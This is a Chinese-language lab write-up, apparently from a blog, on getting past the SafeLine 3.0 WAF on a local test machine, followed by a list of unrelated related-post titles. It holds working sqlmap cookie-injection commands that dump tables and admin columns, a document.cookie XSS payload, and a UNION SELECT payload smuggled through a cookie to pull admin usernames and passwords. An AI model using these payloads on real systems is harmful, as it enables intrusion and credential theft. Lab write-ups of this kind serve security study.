雷池3.0 漏洞扫描

实验环境:

靶机:win8 192.168.19.131

攻击机 :win10 192.168.19.1

漏洞复现

方式一 sqlmap 绕过waf

首先下win8服务器上搭建雷池3.0的服务

win8使用net模式 win10重启一下vm8网卡

通过浏览器就可以访问 雷池的网站

随便点一个一个服务 可以看到**?id=46** 所以习惯进行sql注入

?id=1
?id=1'

可以看出 用‘进行注入 被waf拦截

被后台记录 所以换个方式

打开awvs对该网站进行扫描 发现高危很多 但是有部分是误报 所以…

但是仔细分析一下 找到 javascript:domxssExecutionSink

百度一下javascript:domxssExecutionSink 找到一篇相似的文章 根据分析 构造 语句

#javascript:alert(document.cookie);

反显出cookie 所以 换个思路 cookie注入

打开sqlmap 进行注入

python sqlmap.py -u http://192.168.19.131:81/onews.asp --cookie "id=46" -tables  --level 2   爆表


python sqlmap.py -u http://192.168.19.131/onews.asp --cookie "id=46" -T admin -columns  --level 2 爆列名

爆用户和密码

方式二 xss

根据上边思路 可以进行xss 显示cookie 所以 构造语句

#javascript:alert(document.cookie="id="+escape("45 union select 1,2,3,4,5,6,7,admin,password,10,11 from admin"));

雷池3.0 漏洞扫描相关推荐

  1. Nessus8.4.0漏洞扫描工具安装及使用

    Nessus 8.4.0安装及使用 1.1先去Nessus官网https://www.tenable.com下载最新的安装包. 1.2点击downloads下载,进入nessus页面. 1.3根据自身 ...

  2. [原创]K8_C段旁注工具6.0 新增SMB漏洞扫描

    工具: K8_C段旁注工具6.0_0510[K.8] 编译: 自己查壳 组织: K8搞基大队[K8team] 作者: K8拉登哥哥 博客: http://qqhack8.blog.163.com 发布 ...

  3. 面包牛奶的挖洞记录(一)漏洞扫描方面的法律须知和等级保护2.0简介

    面包牛奶的挖洞记录(一)漏洞扫描方面的法律须知和等级保护2.0简介 你好哇!我是你们的面包牛奶啊,在大二学习完信息安全基础后,我就忍不住想证明自己的实战能力,于是我开始了我痛苦并着快乐的漏洞前期准备工 ...

  4. 漏洞扫描处理:凝思6.0.80操作系统安装数据库Mysql 8.0.27(二进制安装包安装)

    因网络安全测试,漏洞扫描检测出原先的Mysql5.7.XX数据库存在漏洞等等问题,需要升级Mysql最新版本的数据库,现记录如下升级步骤: 1.首先登录Mysql官网MySQL,选择DOWNLOADS ...

  5. EXP6 信息搜集与漏洞扫描

    1.实验有关问题 (1)哪些组织负责DNS,IP的管理. ICANN是一个集合了全球网络界商业.技术及学术各领域专家的非营利性国际组织,负责在全球范围内对互联网唯一标识符系统及其安全稳定的运营进行协调 ...

  6. Web漏洞扫描(三:Burp Suite的基本操作)

    任务二.Burp Suite基础Proxy功能: 2.1.在Kali虚拟机中打开Burp Suite工具并设置,打开"Proxy"选项卡,选中"Options" ...

  7. 漏洞扫描工具_Vulmap漏洞扫描工具

    本文来源于https://github.com/zhzyker/vulmap 已与作者联系 作者同意发送本文章 Vulmap目前支持以下漏洞 +-------------------+-------- ...

  8. 2018-2019-2 20165315《网络攻防技术》Exp6 信息搜集与漏洞扫描

    2018-2019-2 20165315<网络攻防技术>Exp6 信息搜集与漏洞扫描 目录 一.实验内容 二.实验步骤 1.各种搜索技巧的应用 2.DNS IP注册信息的查询 3.基本的扫 ...

  9. 20145220韩旭飞《网络对抗》Exp6 信息搜集与漏洞扫描

    20145220韩旭飞<网络对抗>Exp6 信息搜集与漏洞扫描 信息搜集 whois查询 以百度的网址为例,使用whois查询域名注册信息: 从上图中可以得到3R注册信息,包括注册人的名字 ...

最新文章

  1. linux删除项目命令,项目2 Linux基本命令
  2. 10年Java老兵宝藏资料,吐血奉献!
  3. Java入门时的一些基本概念的理解(j2ee,j2se,j2me,jdk,sdk,jre,jvm,跨平台)
  4. shellcode模板(使用hash获取API)
  5. 解决crontab 定时任务加载失败
  6. 橡皮擦的英语_从填字涂鸦到英语启蒙,家长口中的儿童版“秘密花园”涂色游戏测评【玩具测评】...
  7. mysql 镜像备份_手动构建percona-xtrabackup Docker镜像,并实现mysql数据备份
  8. 命令行查看Memcached运行状态
  9. 新手如何让淘宝店铺的销量提升, 该如何做!
  10. Linux下recv函数的使用细节
  11. web前端之跳一跳网页版小游戏
  12. 芯片代理商哪家专业 品质是否有保障
  13. MPI_多节点执行程序
  14. 九、多线程(高琪java300集+java从入门到精通笔记)
  15. 『TensorFlow』TFR数据预处理探究以及框架搭建
  16. Solidity 生成Java类
  17. 一个关于Linux Bridge配置的吐嘈
  18. 很好用的数据库数据字典【可导出为word , excel文件】
  19. mysql创建三个表相互关联_mysql – 在三个表之间创建关系
  20. 学信息安全买计算机,大学学习计算机类信息安全方向真的很蠢吗?

热门文章

  1. SkeyeWebPlayer.js H5播放器开发之播放器video动态创建(三)
  2. java面试题及答案(java面试题及答案整理)
  3. Vue.js项目:制作一个Markdown格式的笔记本(上)
  4. Java对比两张Excel表的数据,java对比两个excel或者一张excel和数据库的一张表的数据是否相同,两张excel表格匹配相同的数据库...
  5. 如何写一份“靠谱”的测试计划书
  6. appium连接夜神模拟器的坑
  7. NTP linux NTPD 命令解释
  8. gdc服务器无信号接入,电脑显示屏无法接入信号的解决方法
  9. 【每日早报】2019/07/26
  10. java通过opc协议获取ifix实时数据